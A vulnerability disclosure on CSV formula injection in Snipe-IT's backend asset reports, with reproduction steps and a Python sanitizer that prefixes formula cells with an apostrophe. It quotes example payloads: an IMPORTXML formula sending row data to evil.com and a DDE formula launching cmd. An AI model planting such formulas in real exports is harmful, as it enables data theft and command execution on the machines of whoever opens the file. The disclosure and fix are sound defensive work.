CSV Injection in CSV files generated by the backend in snipe/snipe-it
Sep 27th 2022
Formula Elements are not sanitized before adding to CSV reports. This leads to CSV formula injection.
Proof of Concept
Steps to reproduce:
1. Log in to Snipe-IT and create a new Asset with arbitrary values. For the Asset Tag, enter =1+1 (Screenshot 1)
2. Go to Reports -> Custom Asset Report. Click on Generate and save the CSV report
3. Observe that the formula entered into the Asset Tag field is not sanitized in the CSV report (Screenshot 2)
4. To prove the CSV injection, open the CSV file in a program like Excel or LibreOffice and observe that the content is interpreted as a formula. Remark: whether this is actually interpreted as a formula depends on the program and platform settings. Google Sheets with default settings was used for this PoC (Screenshot 3)
Note: Formulas in CSV files generated by the frontend are properly sanitized, for instance Assets -> List All -> Export -> CSV (Screenshot 4).
Remarks on Exploitation
The exploitation of CSV injection is platform and program dependent. CSV files are typically viewed with programs like Microsoft Excel, LibreOffice or Google Sheets. Each of these programs might interpret formulas differently or implement mitigations against CSV injection. This is outside of the scope of Snipe-IT, though. Snipe-IT should implement proper formula sanitization to ensure that end users are protected from CSV injection regardless of the program used to open CSV files. Here are some potential payloads to exploit CSV injection (not tested, as this is considered out of scope):
=IMPORTXML(CONCAT("http://evil.com/?v=", CONCATENATE(A2:E2)), "//a/a10")
Local File Exfiltration:
Remote Code Execution:
=cmd|' /C calc'!A0
The impact of CSV injection can be data exfiltration, local file inclusion, and even remote code execution. The concrete impact depends on the program used by the victim to open the CSV file, as some programs might implement mitigations against CSV injection.
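The sanitization the report asks for, as an added example written for this page (it is not Snipe-IT's code and does not use its API): every cell that starts with a formula trigger character (=, +, -, @, tab, carriage return, following the OWASP CSV Injection guidance) is prefixed with an apostrophe, and every field is then double-quoted by the CSV writer so that embedded quotes and delimiters cannot break out of the cell. The asset rows, function names and column layout are constructed for the example; the two formula values are the ones quoted in this report.

```python
import csv
import io
from typing import Iterable, Sequence

# Characters that spreadsheet applications treat as the start of a formula
# (OWASP CSV Injection guidance: =, +, -, @, tab, carriage return).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of showing it."""
    if not value:
        return False
    if value[0] in FORMULA_TRIGGERS:
        return True
    # Some applications trim leading spaces before deciding whether a cell
    # is a formula, so "  =1+1" must be treated like "=1+1".
    return value.lstrip(" ")[:1] in FORMULA_TRIGGERS


def sanitize_cell(value) -> str:
    """Neutralise a single cell value for safe inclusion in a CSV export."""
    text = "" if value is None else str(value)
    if is_formula(text):
        # A leading apostrophe marks the cell as literal text. Quoting and
        # escaping of the whole field is left to csv.writer (QUOTE_ALL).
        return "'" + text
    return text


def write_report(header: Sequence[str], rows: Iterable[Sequence]) -> str:
    """Render header + rows to CSV text with every cell sanitized and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow([sanitize_cell(h) for h in header])
    for row in rows:
        writer.writerow([sanitize_cell(c) for c in row])
    return buf.getvalue()


# Constructed sample rows (hypothetical asset inventory). The first two asset
# tags are the formula values quoted in the report above; the third shows the
# trade-off that a harmless value with a leading '-' is neutralised too.
SAMPLE_HEADER = ("Asset Tag", "Model")
SAMPLE_ASSETS = [
    ("=1+1", "Laptop"),
    ("=cmd|' /C calc'!A0", "Desktop"),
    ("-42", "Monitor"),
    ("ASSET-001", "Phone"),
]


def demo_report() -> str:
    """The sanitized custom asset report for the constructed sample rows."""
    return write_report(SAMPLE_HEADER, SAMPLE_ASSETS)


if __name__ == "__main__":
    print(demo_report(), end="")
```

The apostrophe prefix is the widely recommended approach, but it is a trade-off: some applications display the apostrophe literally, and values that merely look like formulas (negative numbers, phone numbers with a leading "+") are altered as well. Applying it on the export path, as the frontend export already does according to the note above, keeps the stored asset data untouched while protecting whoever opens the report.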